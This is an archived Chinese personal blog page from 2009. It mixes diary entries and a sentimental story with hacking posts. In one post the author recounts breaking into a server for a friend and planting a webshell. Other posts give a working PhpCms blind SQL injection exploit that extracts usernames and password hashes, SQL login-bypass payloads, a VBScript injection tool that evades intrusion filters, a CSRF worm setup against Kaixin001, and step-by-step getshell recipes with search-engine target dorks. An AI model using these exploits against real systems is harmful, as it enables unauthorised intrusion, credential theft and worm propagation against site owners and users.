前两天买了一只金蟾和一只斗鱼,又买了两只孔雀放在我的鱼缸里面,结果今天竟看到金蟾把我的孔雀给吃了,实在郁闷,后来网上一查,原来这事不是我一个人发生过,还有别的人和我有一样的遭遇,哎~~~~

九月 30th, 2009

Posted In: 未分类

上周一哥们丢一地址,这站拿下来吧,我说项目忙,看着比较简单,说忙完给你写一个吧,哥们说比较急,然后我就把压箱底的东西拿了出来,先收集站点信息,服务器信息,寻找漏洞,昨晚便拿下了一台,结果发现是跳转后的地址,拿的不是想要的服务器,哥们说,在想想办法,换下思路,与是乎又想各种各样的办法在次成功入侵服务器,丢上shell截了图晒一下,有两年多没有入侵网站了,因为我一直都是做网络安全,发现漏洞并通知管理员,看到这台服务器上已经有N个高手踩过了,我也就拿点我要的东西闪人,

本人用的方法
1:注入拿后台
2:想办法上传shell,第一个图为NC提接上传
3:拿后台用到了社工,上传shell,不让备份asp或是asa的文件,然后利用恢复,将文件恢复成了asa文件,如恢复asp文件提示成功实际是没有成功,经多次测试的结果

入侵方法都比较简单,关键是要灵活多变

以下截图

九月 27th, 2009

Posted In: 未分类

没什么写的,留个记号,以后回忆,215,7-3

九月 26th, 2009

Posted In: 未分类

曾经,有一个哑巴小男孩。他的邻居是一个漂亮的女孩,假如要他形容她的漂亮和温柔,那么或许就是隐起双翅的天使吧!男孩无法自拔的喜欢上女孩,但是他也明白自己只是个哑巴,对他来说女孩就像画像上的维纳斯,可望而不可求。女孩和男孩的家境都不是很富裕,他们都很认真的学习,希望有一天能出人头地。男孩,比女孩大一届。第一年,男孩考上了大学,去了外地。临走时,女孩说:等我,我会去找你。男孩点了点头,踏上了离乡的火车。第二年,男孩那到了录取通知单。
站在大学的门口,女孩的漂亮引起了无数男生的驻足和女生的羡慕。她在找人,她找遍了每一个系,却找不到男孩。
老师说:去年,男孩没有来报到。女孩哭了,哭得那么伤心,落在地上的眼泪和一年来的期盼一起跌得粉碎。
女孩还是坚强了起来,她相信男孩一定在什么地方努力着,所以她也不会放弃。女孩交不起全部的学费,虽然学校已经减去了部分学费,但是学费对女孩来说还是一个不小的问题。其中的一天,女孩收到了一封家信,信中父母告诉她,有一个亲戚原因资助她读完大学,女孩笑了,上了大学后,这事她第一次开心的笑出来。天天都有不少优秀的男孩围绕在女孩身边,但是,女孩的心里只有哑巴哥哥。放假了,女孩回到家了。有男孩的消息吗?女孩问男孩的父母。没有,我们也很担心,女孩的父母嘴了说着,表情却异常平静。我可以去拜访并谢谢那位亲戚吗?女孩问父母。他们说不用了,而且他住的很远,是为远房亲戚,女孩的父母这样说,却不知道为什么编曲显得很紧张。终于,聪明的女孩明白了,男孩没有消息的原因。但是她没有说破,她把这份欣喜埋在了心底,她要认真学习,到大学毕业,她就要去找男孩。
四年时间转瞬即逝,女孩拿到了毕业证书和一份国际知名企业的聘用合同。她迫不及待地会到了家乡,男孩的父母终于对女孩的态度屈服,说出了男孩所在的工厂。具有腐蚀的酸气,灼热的蒸气,三米看不到东西的车间。。。。。。
女孩站在车间门口,看着男孩不在挺直的身影。女孩的泪又流下来了,男孩别呜呜的哭声吸引,看了这部一眼。瞬间,像触电一样,男孩消失在滚烫的蒸汽雾之中。女孩也冲进去,但是,这个也不是,那个也不是,每个人影都打破了女孩的希望。终于,在最后的一个车间,女孩找到了那熟悉的却又生疏的身影。“我要嫁给你”,女孩说,虽然她被呛得直流眼泪,依然面如桃花的笑着,这是她练习了四年的话。然后,她看着男孩,等待着他的回答。
男孩看着她,忽然又跑了,再次消失在蒸汽里,也再次从她的生活中消失。伤心的女孩把自己关在房间里哭了三天,然后,她背起行囊。毕竟,所爱的人不见了,但生活还要继续。女孩从她父母口中得知,男孩也来到了这个城市,她又笑了,因为她知道,男孩在默默守护她。好几次,她似乎看到了男孩的身影,但当她追过去的时候,那个身影却早已消失在茫茫人海。
直到有一天,女孩住进了医院。男孩忽然出现在她的面前,脖子上缠着厚厚的绷带。“怎么了?”女孩焦虑地问?“他工作时不小心被钢丝绞到了脖子,没死已经是万幸。”她的工友说。男孩也焦虑的看着她,急于知道她来医院的原因。
“我”,女孩慢慢的说:“我的身帯长了个肿瘤,假如动手术的话,我会失声的。”女孩这样说着,但是,眼神里却流露出一份喜悦。从那天起,男孩又回到了她的身边,无微不至的照顾她。直到手术前,女孩看着男孩说:“或许这是我对你说的最后一句话。我–要–嫁–给–你。我不是可怜你,是因为:我——喜——欢——你!”这最后三个字,她并没有发出声,只是用唇形默默地念。她为了爱,做一个哑巴。
男孩哭了,然后,看着她被推进手术室。灯熄了,主刀医生走出来,对男孩说:“手术成功了,但是她再也不能说话了。”然后,男孩看到了女孩幸福的眼神。现在他和她一样了。她费力的打着一句手语:我爱你!男孩也颤抖着做了一个同样的手势。
他们结婚了,平凡简单的婚礼。婚后,一切都是那么平静和美满。他们的世界没有声音,但是同样有欢声笑语。然而,老天又一次捉弄了这对苦命鸳鸯,幸福的生活只维持了四年。
男孩得了癌症,是恶性晚期。女孩这次没有哭,她知道男孩希望她坚强的活下去男孩安详地合上了眼睛,嘴角的微笑表示他走得并不痛苦。女孩终于忍不住了,握着男孩渐渐冰冷的手,哭声由呜咽变成了响彻医院的悲声。女孩的朋友安慰着她。
她轻轻地抚摸男孩的相片,终于,她喃喃的说“为什么,好不容易走到了一起,为什么你却独自先走了,你忍心留我一个人在这个世界上吗?难道就因为我欺骗了你,你就舍我而去吗?几十年后的一个清晨,风烛残年的她站在男孩的墓前,放上他最爱的百合花。忽然,她发现放在墓碑上放着一封信。
她颤抖着打开了信,是他的一位劳工友写的:这么多年了,或许不用在瞒你了。那次,你在医院看见他脖子上包着绷带 ,其实,不是什么工伤。一位闻名外科医生利用人造声带为他再造手术,他,很早就可以说话了。但是因为知道你马上就要失去语言的能力,他就这份喜悦藏在心底。为了你,他愿意继续做哑巴。

本以为他走了,便不会再流泪了,几十年后,却又尝到泪水咸涩的滋味。信任,老实,是爱情的基础,但有时,善意的谎言所表达的爱,却并非言语可以传递。他们的世界没有声音,但是却同样有欢声笑语。
为了爱,做一个哑巴。

九月 24th, 2009

Posted In: 未分类

漏洞存在于yp/job.php的17-34行,urldecode函数惹的祸,代码如下:
[code]
switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() – 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0; $where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

exp:

".
"n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"nn";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1rn".
"Host: {$hostname}rn".
"Connection: Closernrn";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "x' or ASCII(SUBSTRING((Select {$fld} FROM ".$prefix."member Where userid = '{$uid}'),{$pos},1))={$chr} or '1' = '2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/(.+)/", $outcode, $x);

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

$query = "x%2527";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns ()
//{
echo "n——————————————————————————–n";
echo " PhpCms 2008 (job.php $genre) Blind SQL Injection Exploitn";
echo " By My5t3ry (http://hi.baidu.com/netstart)n";
echo "n——————————————————————————–n";
echo "[~]trying to get pre…n";

if ($match[1]) {

echo '[+]Good Job!Wo Got The pre -> '.$match[1]."n";
}

else {
die(" Exploit failed…");
}

echo "[~]trying to get username length…n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' or length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." or '1'='2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/(.+)/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed…");}

if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}

$length=$i-1;
echo "[+]length -> ".$length;

// return $length;
//}

echo "n[~]Trying to Crack…";
echo "n[+]username -> ";

while ($pos <= $length) { $key = "abcdefghijklmnopqrstuvwxyz0123456789"; if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } $pos = 9; echo "n[+]password(md5) -> ";

while ($pos <= 24) { $key = "abcdef0123456789"; if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } echo "n[+]Done!"; echo "nn--------------------------------------------------------------------------------"; ?>

[/code]

九月 24th, 2009

Posted In: 未分类

原创作者:oldjun
文章来源:http://www.oldjun.com/
注:本文已经发表在《黑客手册》2009年05期

本 文章无技术含量,只是提供一个思路,思路来源于前不久暴出的那个ewebeditor2.16版本的上传漏洞。对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。

首先我们回顾下老的万能密码or漏洞的实现机制,先帖一段asp源码:

—————————老的存在or漏洞的asp代码—————————————-

[code]
username = request.form("username")password = request.form("password ")set rs=server.createobject("adodb.recordset")sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"rs.open sql,conn,1,3
[/code]
——————————————————————————————————–

将表单中的username和password数据分别赋值给username和password,执行[code]
select * from admin where UserName='"&username&"' And PassWord='"&password&"' [/code]语句
但如果被赋值的username是 ' or ''=' (password任意填写)则SQL语句变成了[code]
select * from admin where UserName='' or ''='' And PassWord='123'[/code]
''=''条件成立,则语句成功找到管理表里首位的帐号身份验证登陆,因而成了or漏洞,除' or ''='以外,'or'='or' 啊什么的都可以,于是早年or漏洞形成了万能登陆密码。

针对这种or漏洞,很多asp站点进行了改进,改进后的源码大致如下:

—————————后来经过改进后的asp代码—————————————–

[code]
username = request.form("username")password = request.form("password ")set rs=server.createobject("adodb.recordset")sql = "select [password] from admin where UserName='"&username&"'"rs.open sql,conn,1,3If password = rs("password") then…’登陆成功,文章来源:http://www.oldjun.com/End if
[/code]
——————————————————————————————————–

现在很多asp站点的登陆页面都是这么写的,如果是mssql,还可以执行SQL语句;但如果是ACCESS,很多人应该都会望而却步了吧?其实在没有过滤单引号的情况下,我们还是可以用“万能密码”登陆进后台的。

下面我们进入主题,讨论新型万能登陆密码,以php代码为例,由于字符集编码的问题,管理登陆端可以注入,先看源码:

———–存在字符集漏洞或者magic_quotes_gpc为off的php代码——————-

[code]
$row=$DB->query_first("Select * FROM admin Where username='$username'");If($row){if($password!=$row[password]) {…..//成功,文章来源:http://www.oldjun.com/}else{echo "用户名或密码错误!";}}else{echo "用户名或密码错误!";}
[/code]
——————————————————————————————————–

由于字符集问题,我们可以注入,但由于回显都一样,所以猜不到数据。根据错误提示,我们发现管理表一共6列,password在第三列,于是我们构造如下用户名与密码:
[code]
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
[/code]
带入登陆框,sql语句为:
[code]
Select * FROM admin Where username='-1蟎' union select 1,1 as password,1,1,1,1[/code]
前面的用户名肯定不存在,于是select出来的password就是1了,就等于提交的password了,经测试,成功绕过验证。

现在我们再回头看看之前改进过的asp登陆代码,我们该如何绕过呢,原理同上:
[code]
Username=-1' union select 1 as [password] from admin where '1'='1
Password=1

[/code]
轻松绕过认过,自由发挥

九月 23rd, 2009

Posted In: 未分类

作者:lcx

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If

Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型"
wsh.echo "sqlids v0.02 by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||———–>得到全部库名"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||——–>得到全部表名"
wsh.echo "cscript "&wscript.scriptname&" url filed 表名||———->得到全部字段"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 表名||———->得到字段内容"
wsh.echo string(79,"*")&vbcrlf
end Sub
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", url, False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function ReplaceKeyWord(Value)'绕过ids过虑
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|—>-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
Next
End Function
Function result(sHTMLTEMP) '用nvarchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML = Split(sHTMLTEMP, "nvarchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function

Function Str2Hex(strHex)'sql的16进制转换函数
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = "0x"&sHex
End Function

'————————————–以下代码是注入语句,完全不需要引号
url=arg(0)
set arg=wscript.arguments
if arg.count=0 then wscript.quit
injection =arg(1)

select case injection
case "dbname"
wscript.echo result(Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name(0)>0–")),Chr(34),""))&"(当前库)"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name("&i&")>0–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "table"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "filed"
colname=Str2Hex(arg(2))
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>COL_NAME(OBJECT_ID("&colname&"),"&i&")–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "result"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("a%nd 0<>(se%lect top 1 "&arg(2)&" from "&arg(3)&" where "&arg(2)&" not in (select top "&i&" "&arg(2)&" from "&arg(3)&"))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
Case else
wscript.echo "注意参数"
usage()
end select

九月 23rd, 2009

Posted In: 未分类

# 鬼仔:最近比较忙,所以更新比较少,抱歉。

来源:80sec

背景说明:开心网是SNS类型网站中做得非常成功的一个站点,拥有海量的用户群,提 供的服务包括照片存储与分享、日记分享、短消息与在线聊天等沟通手段、休闲游戏、在线音乐播放分享等,而其本身对安全也相对于其他网站来说有较多关注。 80sec发现开心网中的某些地方实现得并不好,存在一些安全漏洞,而某些安全漏洞却对于web安全非常具有代表性,在某些情况下可能造成比较大的影响, 本次攻击测试即是对问题的简单证明,同时后续会给出处理此类问题时的解决方案。

漏洞分析:Flash在越来越多的网站得到广泛的应用,往往被用来播放视频,游戏或者是其他复杂的用户交互功能,但是在使用Flash的时候,大部分的网站处理的时候并没有想象中那么安全,譬如在开心网的发日记的地方使用Flash的方式如下:

开心网直接允许在页面引入其他域的Flash,同时为了安全性,在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用 语法分析的方式来做过滤,无法被绕过,但是这里漏掉了一个重要的属性allowNetworking,利用这个属性flash可以通过浏览器做网络访问。
同时开心网另外一个严重的问题就是CSRF问题,尽管其在重要的数据更改的地方都限制只能使用POST方式提交,但是所有的请求数据内容可以被预知,很容 易就实现CSRF攻击。而开心网用户之间的交互非常之多,利用一些简单的功能就可以实现将某些内容引诱其他用户访问,CSRF的固有的攻击的被动性可以得 到有效的弥补。
综合上面几点,我们就可以利用其中的漏洞主动的攻击开心网在线用户了。

技术实现:80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash,具体地址为http://www.80sec.com /fly_flash-0-1-release.html,利用Fly_Flash我们可以很方便的实现一次渗透测试,譬如在配置文件里写上

3,http://www.80sec.com/action.php?80sec,,,user=data&pass=data
既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求,请求的内容为后面的user=data&pass=data部分,并且整个请求不会受到浏览器的隐私策略的限制,可以同时使用持久Cookie和Session Cookie。

1发布一个含有测试Flash的帖子,内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码


2http://www.80sec.com/fly_flash.txt内容是我们要构造的数据包请求,这里利用开心网的转贴功能实现内容在用户之间的传播

2,http://img.users.51.la/3182000.asp3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20569243&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=13,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20570931&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=13,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20567962&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=13,http://www.kaixin001.com/friend/addverify.php?80sec,,,from=&touid=773000&content=hi+%0D%0A%3A%29&rcode=&code=&usercode=&email=&bidirection=

其中2,http://img.users.51.la/3182000.asp用作访问的统计,后面的就是自己构造的对http: //www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php发起的POST请求,后面的数据 就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴,一旦其他好友查看之后就会再次自动转贴,蠕虫实现了借助转贴功能的传播。

3恩,结束,就这么简单。

漏洞修复:我们将在后续对Flash的安全使用问题做深入探讨,这里建议开心网从根本上对CSRF问题做防范

九月 23rd, 2009

Posted In: 未分类

由于新云4.0对注册用户未过滤特殊字符,造成黑客通过脚本编码转换将一句话木马写入数据库文件,从而获得WEBSHELL权限。

测试:

1. 打开www.google.cn 搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧

2. 将<%execute request("a")%> 编码转换为 ┼攠數畣整爠煥敵瑳∨≡┩愾

3. 以┼攠數畣整爠煥敵瑳∨≡┩愾 为用户名注册帐户

4. 用一句话连接端连接 目标站点url/ask/data/ask_newasp.asa ,密码为 a

5.上传脚本大马或者执行其它操作,这里WEBSHELL权限已经获得。

预防:

1.严格过滤注册用户名,限制注册用户名长度及禁止特殊符号。
2.更改ask/data/ask_newasp.asa 路径及名称。
3.给文件夹做权限设置,去除公共写入权限。

九月 22nd, 2009

Posted In: 未分类

Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg”漏洞
当文件名为x.asp;x.jpg时,Microsoft IIS会自动以asp格式来进行解析。而当文件名为x.php;x.jpg时,Microsoft IIS会自动以php格式来进行解析。

所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的

九月 22nd, 2009

Posted In: 未分类

没想到事隔七年在次吸了烟,然而想法已完全不是往日的单纯,想的事情很多也很杂,或许只是一种放纵,深夜接到你的电话,宝宝你知道我有多想你吗,每次说你总是呵呵一笑,多想很天都能和你在一起,陪着你,虽然有时候很心痛,可和你在一起我可以放弁所有,只想和你在一起,宝宝,以后不要在用香烟来麻醉自己,身边还有我陪着你
http://bbs.zaape.com/files/MengYaTou/music/200906/003.天使在夜里哭.wma

九月 21st, 2009

Posted In: 未分类

2009年9月17日晚,新云0DAY被黑客小组攻破。该漏洞是利用新云注册用户的管理后台软件上传页面,上传

类似 256.asa;ad.jpg 特殊文件名构造的《普瑞斯特》版JPG木马,从而获得WEBSHELL。

google输入 inurl:/soft/show.asp?id=*

在url后接user/reg.asp 注册用户

登陆后,打开发布软件下载页面,勾选不更改文件名,上传《普瑞斯特》版JPG木马

点击下载此文件

九月 18th, 2009

Posted In: 未分类

最近不知道怎么了,越来越在意宝宝的一切,说好的不会管,可事实上很多事情我还在干涉她的想法,这可能是人的本性,努力改变这一现状也希望宝宝能够开心,不必每天都会谈几个特别深重的话题

你学会了我的冷静和表情,可从你的脸上还有眼神我能看出来你在心痛,我一直在努力的控制自己,可越是想你越是很难控制自己,每次我说着以前的点点滴滴,你说不知道我想说什么,其实很多事情你都明白,就像那晚你知道我在想什么一样,我只是在思考,我要怎么办,事情为什么会这样。

音频片段:需要 Adobe Flash Player(9 或以上版本)播放音频片段。 点击这里下载最新版本。您需要开启浏览器的 JavaScript 支持。

九月 18th, 2009

Posted In: 未分类

一名安全研究人员发现,FreeBSD操作系统中存在能让限权的用户完全控制整个系统的安全漏洞。
 一名叫Przemyslaw Frasunek的波兰安全顾问告诉Register小组:Bug存在于FreeBSD的kqueue通知接口,通过这个Bug就能完全掌握root权限。它的影响范围从6.0版本到6.4版本的操作系统。而7.1及以后的版本不容易受到攻击。
 无论是合法的用户或者黑客,想要利用漏洞必须先能从本地访问系统,这就为攻击者提供了攻击系统的突破口。
 Bug使得FreeBSD kqueue的混乱,并导致NULL指针在内核模式中的*号运算。攻击者通过将一个内存页中的代码映射到地址0x0来运行恶意软件。
 Frasunek说,他于8月29日向FreeBSD官方发出了通知,但还未得到回复。FreeBSD的核心小组成员Robert Watson,告诉Register,那封电子邮件已丢失,他希望尽快得到相关的报告

九月 16th, 2009

Posted In: 未分类

很早以前QQ就推出了webqq进行测试,当时就开通了邮箱测试,感觉很好,在有些没有安装qq的地方想上下QQ就比以前简单多了,不用下载,当webqq内测时也开通内测,效果已经很好了,现在QQ的webQQ正式上线,本人在测试测体验,功能已经相当的好了,增强了sns提醒功能,文件传输功能,一般的基本功能已经覆盖进去了,喜欢的人可以去体验一下
http://web.qq.com
以下是本人测试的截图

九月 16th, 2009

Posted In: 未分类

下一页 »

无觅相关文章插件,快速提升流量